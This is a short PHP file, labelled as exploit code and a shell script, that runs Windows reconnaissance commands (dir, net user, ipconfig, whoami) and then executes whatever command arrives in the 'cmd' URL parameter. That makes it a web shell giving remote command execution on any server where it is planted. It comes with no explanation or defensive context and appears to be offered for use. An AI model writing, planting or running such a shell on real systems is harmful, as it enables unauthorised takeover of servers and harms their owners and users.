<?php //Exploit Code system('\dir'); system('\net user'); print passthru ('\ipconfig'); exec('\whoami',$a); print_r($a); //Shell Script //shell.php?cmd=net user $cmd = '\\'.$_GET['cmd']; system($cmd); ?>